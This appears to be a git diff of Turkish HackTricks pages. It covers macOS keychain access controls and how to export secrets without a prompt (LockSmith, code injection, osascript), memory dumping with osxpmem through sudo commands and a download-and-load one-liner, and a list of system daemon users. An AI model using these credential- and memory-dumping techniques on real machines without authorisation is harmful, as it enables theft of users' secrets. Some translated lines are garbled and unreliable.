* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* [**The PEASS Ailesi**]'ni (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'in (https://opensea.io/collection/the-peass-family) koleksiyonu
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -28,14 +28,14 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
---
|
||||
|
||||
## Anahtarlık Girişleri
|
||||
## Ana Anahtarlıklar
|
||||
|
||||
* **Kullanıcı Anahtarlığı** (`~/Library/Keychains/login.keycahin-db`), uygulama şifreleri, internet şifreleri, kullanıcı tarafından oluşturulan sertifikalar, ağ şifreleri ve kullanıcı tarafından oluşturulan genel/özel anahtarlar gibi **kullanıcıya özgü kimlik bilgilerini** saklamak için kullanılır.
|
||||
* **Sistem Anahtarlığı** (`/Library/Keychains/System.keychain`), WiFi şifreleri, sistem kök sertifikaları, sistem özel anahtarları ve sistem uygulama şifreleri gibi **sistem genelindeki kimlik bilgilerini** saklar.
|
||||
|
||||
### Şifre Anahtarlık Erişimi
|
||||
### Şifre Anahtarlığı Erişimi
|
||||
|
||||
Bu dosyalar, doğal korumaya sahip olmasalar da **şifrelenmiştir** ve **çözülmek için kullanıcının düz metin şifresine ihtiyaç duyarlar**. [**Chainbreaker**](https://github.com/n0fate/chainbreaker) gibi bir araç şifre çözme işlemi için kullanılabilir.
|
||||
Bu dosyalar, doğal korumaya sahip olmasalar da **indirilebilirler** ve şifrelerin **çözümlenmesi için kullanıcının düz metin şifresine ihtiyaç duyarlar**. [**Chainbreaker**](https://github.com/n0fate/chainbreaker) gibi bir araç şifre çözümlemek için kullanılabilir.
|
||||
|
||||
## Anahtarlık Girişleri Korumaları
|
||||
|
||||
|
@ -43,13 +43,13 @@ Bu dosyalar, doğal korumaya sahip olmasalar da **şifrelenmiştir** ve **çöz
|
|||
|
||||
Anahtarlıkta her giriş, anahtarlık girişinde çeşitli işlemleri kimin yapabileceğini belirleyen **Erişim Kontrol Listeleri (ACL'ler)** tarafından yönetilir, bunlar şunları içerir:
|
||||
|
||||
* **ACLAuhtorizationExportClear**: Sahibin sırrın açık metnini almasına izin verir.
|
||||
* **ACLAuhtorizationExportWrapped**: Sahibin sırrı başka bir sağlanan şifre ile şifrelenmiş şekilde almasına izin verir.
|
||||
* **ACLAuhtorizationExportClear**: Sahibin şifrenin açık metnini almasına izin verir.
|
||||
* **ACLAuhtorizationExportWrapped**: Sahibin şifreyi başka bir sağlanan şifre ile şifrelenmiş açık metin olarak almasına izin verir.
|
||||
* **ACLAuhtorizationAny**: Sahibin herhangi bir işlemi gerçekleştirmesine izin verir.
|
||||
|
||||
ACL'ler, bu işlemleri kullanıcıya sormadan gerçekleştirebilen **güvenilir uygulamaların listesi** ile desteklenir. Bu şunları içerebilir:
|
||||
ACL'ler, bu işlemleri sorunsuzca gerçekleştirebilen **güvenilir uygulamaların listesi** ile desteklenir. Bu şunları içerebilir:
|
||||
|
||||
* **`Nil`** (izin gerekmez, **herkes güvenilir**)
|
||||
*  **N`il`** (izin gerekmez, **herkes güvenilir**)
|
||||
* Boş bir liste (**hiç kimse güvenilir değil**)
|
||||
* Belirli **uygulamaların listesi**.
|
||||
|
||||
|
@ -64,7 +64,7 @@ Ayrıca giriş, **`ACLAuthorizationPartitionID`** anahtarını içerebilir, bu d
|
|||
**`Anahtarlık Erişimi.app`** kullanılarak **yeni bir giriş oluşturulduğunda**, aşağıdaki kurallar geçerlidir:
|
||||
|
||||
* Tüm uygulamalar şifreleyebilir.
|
||||
* Hiçbir uygulama dışa aktaramaz/çözemez (kullanıcıya sormadan).
|
||||
* **Hiçbir uygulama** dışa aktaramaz/çözemez (kullanıcıya soru sormadan).
|
||||
* Tüm uygulamalar bütünlük kontrolünü görebilir.
|
||||
* Hiçbir uygulama ACL'leri değiştiremez.
|
||||
* **PartitionID** **`apple`** olarak ayarlanır.
|
||||
|
@ -72,10 +72,10 @@ Ayrıca giriş, **`ACLAuthorizationPartitionID`** anahtarını içerebilir, bu d
|
|||
**Bir uygulama anahtarlıkta bir giriş oluşturduğunda**, kurallar biraz farklıdır:
|
||||
|
||||
* Tüm uygulamalar şifreleyebilir.
|
||||
* Yalnızca **oluşturan uygulama** (veya açıkça eklenen diğer uygulamalar) dışa aktarabilir/çözebilir (kullanıcıya sormadan).
|
||||
* Yalnızca **oluşturan uygulama** (veya açıkça eklenen diğer uygulamalar) dışa aktarabilir/çözebilir (kullanıcıya soru sormadan).
|
||||
* Tüm uygulamalar bütünlük kontrolünü görebilir.
|
||||
* Hiçbir uygulama ACL'leri değiştiremez.
|
||||
* **PartitionID** **`teamid:[teamID buraya]`** olarak ayarlanır.
|
||||
* **PartitionID** **`teamid:[teamID burada]`** olarak ayarlanır.
|
||||
|
||||
## Anahtarlığa Erişim
|
||||
|
||||
|
@ -93,38 +93,38 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
|
|||
### API'ler
|
||||
|
||||
{% hint style="success" %}
|
||||
**Anahtarlık numaralandırma ve sızdırmak** için **izin istemeyen** sırları, [**LockSmith**](https://github.com/its-a-feature/LockSmith) aracıyla yapılabilir.
|
||||
**Anahtarlık numaralandırma ve sızdırmazlık** oluşturmayacak sırların **dökümü**, [**LockSmith**](https://github.com/its-a-feature/LockSmith) aracı ile yapılabilir.
|
||||
{% endhint %}
|
||||
|
||||
Her anahtarlık girişi hakkında liste ve **bilgi** alın:
|
||||
Her anahtarlık girişi hakkında **bilgi** listele ve al:
|
||||
|
||||
* **`SecItemCopyMatching`** API'si her giriş hakkında bilgi verir ve kullanırken ayarlayabileceğiniz bazı özellikler vardır:
|
||||
* **`kSecReturnData`**: Doğruysa verileri şifrelemeye çalışır (muhtemel açılır pencereleri önlemek için false olarak ayarlayın)
|
||||
* **`kSecReturnRef`**: Anahtarlık öğesine referansı da alın (daha sonra açılır pencere olmadan şifreleyebileceğinizi gördüğünüzde true olarak ayarlayın)
|
||||
* **`kSecReturnAttributes`**: Girişler hakkında meta verileri alın
|
||||
* **`kSecReturnData`**: Doğru ise verileri şifrelemeye çalışır (potansiyel açılır pencereleri önlemek için false olarak ayarlayın)
|
||||
* **`kSecReturnRef`**: Anahtarlık öğesine referansı da al (daha sonra açılır pencereler olmadan şifreleyebileceğinizi gördüğünüzde true olarak ayarlayın)
|
||||
* **`kSecReturnAttributes`**: Girişler hakkında meta verileri al
|
||||
* **`kSecMatchLimit`**: Kaç sonuç döndürüleceği
|
||||
* **`kSecClass`**: Hangi türde anahtarlık girişi
|
||||
|
||||
Her girişin **ACL'leri** alın:
|
||||
Her girişin **ACL'leri**ni al:
|
||||
|
||||
* **`SecAccessCopyACLList`** API'si ile **anahtarlık öğesi için ACL'yi** alabilir ve her liste şunları içerir:
|
||||
* **`SecAccessCopyACLList`** API'si ile **anahtarlık öğesi için ACL'yi** alabilir ve her liste şunları içeren bir ACL listesi döndürecektir (`ACLAuhtorizationExportClear` ve önceki bahsedilen diğerlerinden) :
|
||||
* Açıklama
|
||||
* **Güvenilen Uygulama Listesi**. Bu şunlar olabilir:
|
||||
* Bir uygulama: /Applications/Slack.app
|
||||
* Bir ikili: /usr/libexec/airportd
|
||||
* Bir grup: group://AirPort
|
||||
|
||||
Veriyi dışa aktarın:
|
||||
Veriyi dışa aktar:
|
||||
|
||||
* **`SecKeychainItemCopyContent`** API'si düz metni alır
|
||||
* **`SecItemExport`** API'si anahtarları ve sertifikaları dışa aktarır ancak içeriği şifreli olarak dışa aktarmak için şifreleri ayarlamak gerekebilir
|
||||
|
||||
Ve bunlar, **izin istemeden bir sırrı dışa aktarabilmek için gereksinimlerdir**:
|
||||
Ve **bir sızıntı olmadan bir sırrı dışa aktarabilmek** için gereksinimler şunlardır:
|
||||
|
||||
* Eğer **1'den fazla güvenilen** uygulama listelenmişse:
|
||||
* Uygun **yetkilendirmelere** ihtiyaç vardır (**`Nil`**, veya sırra erişim yetkisi için yetkilendirme izin listesinde olmak)
|
||||
* Uygun **yetkilendirmelere** ihtiyaç vardır (**`Nil`**, veya sırra erişim için yetkilendirme listesindeki uygulamaların bir parçası olmak)
|
||||
* Kod imzasının **PartitionID** ile eşleşmesi gerekir
|
||||
* Kod imzasının bir **güvenilen uygulamanın** kod imzasıyla eşleşmesi gerekir (veya doğru KeychainAccessGroup üyesi olmak)
|
||||
* Kod imzasının bir **güvenilen uygulamanın** kod imzasıyla eşleşmesi gerekir (veya doğru KeychainAccessGroup'un üyesi olmak)
|
||||
* Eğer **tüm uygulamalar güvenilirse**:
|
||||
* Uygun **yetkilendirmelere** ihtiyaç vardır
|
||||
* Kod imzasının **PartitionID** ile eşleşmesi gerekir
|
||||
|
@ -133,22 +133,22 @@ Ve bunlar, **izin istemeden bir sırrı dışa aktarabilmek için gereksinimlerd
|
|||
{% hint style="danger" %}
|
||||
Bu nedenle, eğer **1 uygulama listelenmişse**, o uygulamaya **kod enjekte etmeniz gerekir**.
|
||||
|
||||
Eğer **partitionID**'de **apple** belirtilmişse, **`osascript`** ile buna erişebilirsiniz, böylece partitionID'sinde apple olan tüm uygulamalara güvenen her şeye erişebilirsiniz. **`Python`** bunun için de kullanılabilir.
|
||||
Eğer **partitionID'de apple** belirtilmişse, **`osascript`** ile buna erişebilirsiniz, böylece partitionID'sinde apple olan tüm uygulamalara güvenen her şeye erişebilirsiniz. **`Python`** bunun için de kullanılabilir.
|
||||
{% endhint %}
|
||||
|
||||
### İki ek özellik
|
||||
|
||||
* **Görünmez**: Girişi **UI** Anahtarlık uygulamasından **gizlemek** için bir boolean bayrak
|
||||
* **Genel**: **Meta verileri** saklamak için (YANİ ŞİFRELENMEMİŞTİR)
|
||||
* **Görünmez**: Girişi **UI** Anahtarlık uygulamasından **gizlemek** için bir boolean bayrağıdır
|
||||
* **Genel**: **Meta verileri** saklamak için kullanılır (bu nedenle **ŞİFRELENMEMİŞTİR**)
|
||||
* Microsoft, hassas uç noktalara erişmek için tüm yenileme tokenlarını düz metinde saklıyordu.
|
||||
|
||||
## Referanslar
|
||||
|
||||
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevsellikler sunan **karanlık ağ** destekli bir arama motorudur.
|
||||
|
||||
|
@ -162,12 +162,12 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
|
||||
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da takip edin.
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar göndererek paylaşın.
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** Twitter'da 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'u takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar gönderin.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# macOS Bellek Dökümü
|
||||
# macOS Bellek Dökme
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -6,21 +6,21 @@
|
|||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na(https://github.com/sponsors/carlospolop) göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* [**The PEASS Ailesi**]'ni (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuzu
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
|
||||
* **Hacking püf noktalarınızı paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -32,25 +32,25 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
### Takas Dosyaları
|
||||
|
||||
`/private/var/vm/swapfile0` gibi takas dosyaları, **fiziksel bellek dolu olduğunda önbellek olarak hizmet verir**. Fiziksel bellekte daha fazla yer olmadığında, veriler bir takas dosyasına aktarılır ve ihtiyaç duyulduğunda fiziksel belleğe geri getirilir. swapfile0, swapfile1 gibi isimlerle birden fazla takas dosyası bulunabilir.
|
||||
`/private/var/vm/swapfile0` gibi takas dosyaları, **fiziksel bellek dolu olduğunda önbellek olarak hizmet verir**. Fiziksel bellekte daha fazla yer olmadığında, veriler bir takas dosyasına aktarılır ve gerektiğinde fiziksel belleğe geri getirilir. swapfile0, swapfile1 gibi isimlerle birden fazla takas dosyası bulunabilir.
|
||||
|
||||
### Uyku Görüntüsü
|
||||
|
||||
`/private/var/vm/sleepimage` konumundaki dosya, **uykuda modundayken kritiktir**. **OS X uyku modundayken bellek verileri bu dosyada depolanır**. Bilgisayar uyandığında, sistem bellek verilerini bu dosyadan alır ve kullanıcıya kaldığı yerden devam etme olanağı sağlar.
|
||||
`/private/var/vm/sleepimage` konumundaki dosya, **uykudan çıkma modunda** hayati öneme sahiptir. **OS X uyku modundayken bellek verileri bu dosyada depolanır**. Bilgisayar uyandığında, sistem bellek verilerini bu dosyadan alır ve kullanıcıya kaldığı yerden devam etme imkanı sağlar.
|
||||
|
||||
Modern MacOS sistemlerinde, bu dosyanın genellikle güvenlik nedenleriyle şifrelendiğini ve kurtarmanın zor olduğunu belirtmek önemlidir.
|
||||
|
||||
* Uyku görüntüsü için şifrelemenin etkin olup olmadığını kontrol etmek için `sysctl vm.swapusage` komutunu çalıştırabilirsiniz. Bu, dosyanın şifrelenip şifrelenmediğini gösterecektir.
|
||||
* Uyku görüntüsü için şifrelemenin etkin olup olmadığını kontrol etmek için `sysctl vm.swapusage` komutu çalıştırılabilir. Bu, dosyanın şifrelenip şifrelenmediğini gösterecektir.
|
||||
|
||||
### Bellek Basıncı Günlükleri
|
||||
|
||||
MacOS sistemlerindeki başka bir önemli bellek ile ilgili dosya **bellek basıncı günlüğü**dür. Bu günlükler `/var/log` konumunda bulunur ve sistem bellek kullanımı ve basınç olayları hakkında detaylı bilgiler içerir. Bellek ile ilgili sorunları teşhis etmek veya sistem belleğin zaman içinde nasıl yönetildiğini anlamak için oldukça faydalı olabilirler.
|
||||
MacOS sistemlerindeki bir diğer önemli bellek ile ilgili dosya **bellek basıncı günlüğü**dür. Bu günlükler `/var/log` konumunda bulunur ve sistem bellek kullanımı ve basınç olayları hakkında detaylı bilgiler içerir. Bellek ile ilgili sorunları teşhis etmek veya sistem belleğin zaman içinde nasıl yönetildiğini anlamak için oldukça faydalı olabilirler.
|
||||
|
||||
## osxpmem ile belleği dökme
|
||||
|
||||
Bir MacOS makinesinde belleği dökmek için [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip) kullanabilirsiniz.
|
||||
|
||||
**Not**: Aşağıdaki talimatlar yalnızca Intel mimarisine sahip Mac'ler için çalışacaktır. Bu araç artık arşivlenmiştir ve son sürümü 2017'de yayınlanmıştır. Aşağıdaki talimatlarla indirilen ikili dosya, Apple Silicon'in 2017'de mevcut olmadığı için Intel yongaları hedef almaktadır. arm64 mimarisi için ikili dosyayı derlemek mümkün olabilir ancak bunu kendiniz denemelisiniz.
|
||||
**Not**: Aşağıdaki talimatlar yalnızca Intel mimarisine sahip Mac'ler için çalışacaktır. Bu araç artık arşivlenmiştir ve son sürümü 2017'de yayınlanmıştır. Aşağıdaki talimatlarla indirilen ikili dosya, Apple Silicon'in 2017'de mevcut olmadığı için Intel çipleri hedef almaktadır. arm64 mimarisi için ikili dosyayı derlemek mümkün olabilir ancak bunu kendiniz denemelisiniz.
|
||||
```bash
|
||||
#Dump raw format
|
||||
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
||||
|
@ -65,7 +65,7 @@ sudo kextutil "/tmp/MacPmem.kext"
|
|||
#Allow the kext in "Security & Privacy --> General"
|
||||
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
||||
```
|
||||
**Diğer hatalar**, sadece "Güvenlik ve Gizlilik --> Genel" bölümünde **kext'in yüklenmesine izin verilmesi** ile **düzeltilebilir**, sadece **izin verin**.
|
||||
**Diğer hatalar**, sadece "Güvenlik ve Gizlilik --> Genel" bölümünde **kext'in yüklenmesine izin vererek** düzeltilebilir, sadece **izin verin**.
|
||||
|
||||
Uygulamayı indirmek, kext'i yüklemek ve belleği dökmek için bu **oneliner'ı** da kullanabilirsiniz:
|
||||
|
||||
|
@ -76,9 +76,9 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize** edilip edilmediğini kontrol etmek için **ücretsiz** işlevler sunan **karanlık ağ** destekli bir arama motorudur.
|
||||
|
||||
|
@ -92,12 +92,12 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,19 +6,19 @@
|
|||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
- **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın(https://github.com/sponsors/carlospolop)!
|
||||
- [**Resmi PEASS & HackTricks ürünleri**]'ni edinin(https://peass.creator-spring.com)
|
||||
- [**PEASS Ailesi**]'ni keşfedin(https://opensea.io/collection/the-peass-family), özel [**NFT'ler**] koleksiyonumuz(https://opensea.io/collection/the-peass-family)
|
||||
- **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
- **Hacking püf noktalarınızı göndererek HackTricks** (https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
|
||||
* **Katılın** 💬 [**Discord grubumuza**](https://discord.gg/hRep4RUj7f) veya [**telegram grubumuza**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
|
@ -30,12 +30,12 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
### Ortak Kullanıcılar
|
||||
|
||||
- **Daemon**: Sistem daemonları için ayrılmış kullanıcı. Varsayılan daemon hesap adları genellikle "\_" ile başlar:
|
||||
* **Daemon**: Sistem daemonları için ayrılmış kullanıcı. Varsayılan daemon hesap adları genellikle "\_" ile başlar:
|
||||
|
||||
```bash
|
||||
_amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, 